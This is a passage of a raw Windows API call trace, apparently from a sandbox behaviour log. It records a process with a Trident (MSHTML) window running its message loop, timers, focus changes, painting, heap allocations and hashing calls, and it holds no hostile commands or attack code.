lpPerformanceCount=0x19a3bc*=3100017039539) returned 1 [0181.352] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0181.352] NtdllDefWindowProc_W () returned 0x0 [0181.352] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0181.352] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.352] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.352] KillTimer (hWnd=0x30316, uIDEvent=0x202b) returned 1 [0181.353] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3100017177068) returned 1 [0181.353] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3100017183544) returned 1 [0181.353] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3100017202520) returned 1 [0181.353] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3100017209385) returned 1 [0181.353] SetEvent (hEvent=0x668) returned 1 [0181.355] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0181.355] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.356] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.356] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0181.356] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0181.356] GetCurrentThreadId () returned 0xb48 [0181.356] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0181.356] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.356] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.356] KillTimer (hWnd=0x30316, uIDEvent=0x2029) returned 1 [0181.356] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0181.445] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.445] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.445] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.771] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0184.771] NtdllDefWindowProc_W () returned 0x0 [0184.771] NtdllDefWindowProc_W () returned 0x0 [0184.772] NtdllDefWindowProc_W () returned 0x0 [0184.774] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0184.774] IsIconic (hWnd=0x103e0) returned 0 [0184.774] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0184.774] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0184.774] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0184.774] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0184.774] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0184.774] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0184.774] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0184.774] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x20040a78 [0184.774] GetUpdateRgn (hWnd=0x103e2, hRgn=0x20040a78, bErase=0) returned 1 [0184.774] DeleteObject (ho=0x20040a78) returned 1 [0184.775] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0184.780] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0184.780] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0184.780] NtdllDefWindowProc_W () returned 0x0 [0184.780] GetCurrentThreadId () returned 0xb48 [0184.781] GetCurrentThreadId () returned 0xb48 [0184.782] NtdllDefWindowProc_W () returned 0x0 [0184.784] NtdllDefWindowProc_W () returned 0x0 [0184.785] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0184.785] NtdllDefWindowProc_W () returned 0x0 [0184.785] NtdllDefWindowProc_W () returned 0x0 [0184.785] NtdllDefWindowProc_W () returned 0x0 [0184.785] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0184.786] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0184.786] NtdllDefWindowProc_W () returned 0x0 [0184.786] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0184.786] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0184.786] NtdllDefWindowProc_W () returned 0x1 [0184.798] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0184.798] GetFocus () returned 0x0 [0184.798] SetFocus (hWnd=0x103e2) returned 0x0 [0184.798] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0184.799] GetMessageTime () returned 30898515 [0184.799] GetMessagePos () returned 0x11e01d6 [0184.799] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x199a74 | out: plResult=0x199a74) returned 0x0 [0184.800] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0184.800] GetMessageTime () returned 30898515 [0184.800] GetMessagePos () returned 0x11e01d6 [0184.800] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.800] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.800] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.800] memcpy_s (in: _Destination=0xd9b0e0, _DestinationSize=0x118, _Source=0xd9afc0, _SourceSize=0x118 | out: _Destination=0xd9b0e0) returned 0x0 [0184.801] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dce00 [0184.801] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.801] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0184.802] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0184.803] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dce00 | out: hHeap=0x5e0000) returned 1 [0184.803] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.804] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.804] memcpy_s (in: _Destination=0xd9b200, _DestinationSize=0x118, _Source=0xd9afc0, _SourceSize=0x118 | out: _Destination=0xd9b200) returned 0x0 [0184.804] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dce00 [0184.804] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0184.804] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0184.805] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0184.806] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.806] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dce00 | out: hHeap=0x5e0000) returned 1 [0184.806] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x199334 | out: plResult=0x199334) returned 0x0 [0184.806] GetCurrentThreadId () returned 0xb48 [0184.808] GetCurrentThreadId () returned 0xb48 [0184.808] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0184.809] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0184.809] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199e44 | out: phIMC=0x199e44*=0x0) returned 0x0 [0184.809] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0184.810] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0184.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.810] GetCurrentThreadId () returned 0xb48 [0184.810] GetCurrentThreadId () returned 0xb48 [0184.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.810] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.811] GetCurrentThreadId () returned 0xb48 [0184.811] GetCurrentThreadId () returned 0xb48 [0184.811] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.811] GetCurrentThreadId () returned 0xb48 [0184.811] GetCurrentThreadId () returned 0xb48 [0184.812] GetCurrentThreadId () returned 0xb48 [0184.812] GetMessageTime () returned 30898515 [0184.812] GetMessagePos () returned 0x11e01d6 [0184.813] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x199da4 | out: plResult=0x199da4) returned 0x1 [0184.813] NtdllDefWindowProc_W () returned 0x0 [0184.813] GetCurrentThreadId () returned 0xb48 [0184.813] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.813] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.814] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0184.814] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.814] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0184.815] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.815] GetCurrentThreadId () returned 0xb48 [0184.815] GetCurrentThreadId () returned 0xb48 [0184.815] IsWinEventHookInstalled (event=0x8005) returned 0 [0184.815] GetCurrentThreadId () returned 0xb48 [0184.816] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0184.816] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.817] GetCurrentThreadId () returned 0xb48 [0184.817] GetCurrentThreadId () returned 0xb48 [0184.817] GetFocus () returned 0x103e2 [0184.817] GetCurrentThreadId () returned 0xb48 [0184.817] IsWinEventHookInstalled (event=0x8005) returned 0 [0184.817] GetCurrentThreadId () returned 0xb48 [0184.817] GetCurrentThreadId () returned 0xb48 [0184.817] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0184.818] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.818] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0184.818] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.818] GetCurrentThreadId () returned 0xb48 [0184.819] GetCurrentThreadId () returned 0xb48 [0184.819] IsWinEventHookInstalled (event=0x800a) returned 0 [0184.819] GetCurrentThreadId () returned 0xb48 [0184.819] LsSetDoc () returned 0x0 [0184.819] LsCreateLine () returned 0x0 [0184.820] LsDestroyLine () returned 0x0 [0184.820] GetFocus () returned 0x103e2 [0184.820] SystemParametersInfoW (in: uiAction=0x2006, uiParam=0x0, pvParam=0x19a268, fWinIni=0x0 | out: pvParam=0x19a268) returned 1 [0184.821] _CIsqrt () returned 0x3ff0027f [0184.821] _CIsqrt () returned 0x3ff0027f [0184.821] _CIatan2 () returned 0x20 [0184.821] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3100364046045) returned 1 [0184.821] GetCurrentThreadId () returned 0xb48 [0184.822] GetCurrentThreadId () returned 0xb48 [0184.822] GetCurrentThreadId () returned 0xb48 [0184.822] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3100364114840) returned 1 [0184.822] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3100364121131) returned 1 [0184.822] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3100364130185) returned 1 [0184.822] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3100364136019) returned 1 [0184.822] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3100364141890) returned 1 [0184.823] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3100364189478) returned 1 [0184.823] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3100364204404) returned 1 [0184.823] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.823] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.823] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.824] SetEvent (hEvent=0x304) returned 1 [0184.824] WTSGetActiveConsoleSessionId () returned 0x1 [0184.824] GetCurrentProcessId () returned 0xe14 [0184.824] GetCurrentThreadId () returned 0xb48 [0184.824] SetEvent (hEvent=0x668) returned 1 [0184.824] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0184.825] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0184.825] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.826] GetAsyncKeyState (vKey=17) returned 0 [0184.826] GetAsyncKeyState (vKey=16) returned 0 [0184.826] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0184.826] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.826] memcpy_s (in: _Destination=0xd9b320, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd9b320) returned 0x0 [0184.826] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0184.827] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.827] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.827] memcpy_s (in: _Destination=0xd9b440, _DestinationSize=0x118, _Source=0xd9b320, _SourceSize=0x118 | out: _Destination=0xd9b440) returned 0x0 [0184.827] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0184.827] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.827] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0184.827] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0184.828] GetMessageTime () returned 30901843 [0184.828] GetMessagePos () returned 0x11e01d6 [0184.828] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x105, wParam=0x1b, lParam=0xe0010001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0184.828] NtdllDefWindowProc_W () returned 0x0 [0184.828] GetCurrentThreadId () returned 0xb48 [0184.829] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.829] GetAsyncKeyState (vKey=17) returned 0 [0184.829] GetAsyncKeyState (vKey=16) returned 0 [0184.829] GetAsyncKeyState (vKey=18) returned 0 [0184.829] TranslateMessage (lpMsg=0x19a5a8) returned 1 [0184.830] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.830] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0184.830] GetCurrentThreadId () returned 0xb48 [0184.830] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.841] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.841] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.841] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0184.841] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0184.841] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3100365998056) returned 1 [0184.842] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0184.842] NtdllDefWindowProc_W () returned 0x0 [0184.842] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0184.842] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0184.842] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0184.842] KillTimer (hWnd=0x30316, uIDEvent=0x202d) returned 1 [0184.843] PostMessageW (hWnd=0x30316, Msg=0x113, wParam=0x2000, lParam=0x0) returned 1 [0184.843] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3100366235735) returned 1 [0184.844] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0184.844] GetFocus () returned 0x103e2 [0184.844] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.845] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfd084 | out: lpRect=0xcfd084) returned 1 [0184.845] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.845] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3100366406828) returned 1 [0184.845] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x4010197 [0184.846] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x21040a78 [0184.846] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0184.846] GetRandomRgn (hdc=0x4010197, hrgn=0x21040a78, i=4) returned 1 [0184.846] OffsetRgn (hrgn=0x21040a78, x=-507, y=-333) returned 2 [0184.846] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0184.846] GetRegionData (in: hrgn=0x21040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0184.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c070 [0184.846] GetRegionData (in: hrgn=0x21040a78, nCount=0x30, lpRgnData=0x9f6c070 | out: lpRgnData=0x9f6c070) returned 0x30 [0184.846] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c070 | out: hHeap=0x5e0000) returned 1 [0184.847] DeleteObject (ho=0x21040a78) returned 1 [0184.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c268 [0184.847] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c268) returned 0x95040a6c [0184.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c268 | out: hHeap=0x5e0000) returned 1 [0184.847] SelectClipRgn (hdc=0x4010197, hrgn=0x95040a6c) returned 2 [0184.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c1f8 [0184.847] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c1f8) returned 0x2c040a81 [0184.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c1f8 | out: hHeap=0x5e0000) returned 1 [0184.849] ValidateRgn (hWnd=0x103e2, hRgn=0x2c040a81) returned 1 [0184.849] DeleteObject (ho=0x95040a6c) returned 1 [0184.849] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0184.850] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0184.851] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.852] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0184.852] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0184.852] HashData (in: pbData=0x9f83118, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0184.852] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0184.852] HashData (in: pbData=0x9f8311c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0184.852] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0184.852] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0184.852] HashData (in: pbData=0x9f830b8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0184.852] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0184.852] HashData (in: pbData=0x9f830bc, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0184.852] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0184.852] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0184.852] HashData (in: pbData=0x9f83130, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0184.852] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0184.852] HashData (in: pbData=0x9f83134, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0184.853] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0184.853] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0184.853] HashData (in: pbData=0x9f82ef0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0184.853] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0184.853] HashData (in: pbData=0x9f82ef4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0184.853] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0184.853] GetSysColor (nIndex=15) returned 0xf0f0f0 [0184.854] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0184.854] HashData (in: pbData=0x9f83160, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0184.854] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0184.854] HashData (in: pbData=0x9f83164, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0184.854] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0184.854] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0184.854] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0184.854] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0184.854] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0184.854] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0184.854] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0184.855] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0184.855] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0184.858] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0184.858] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, 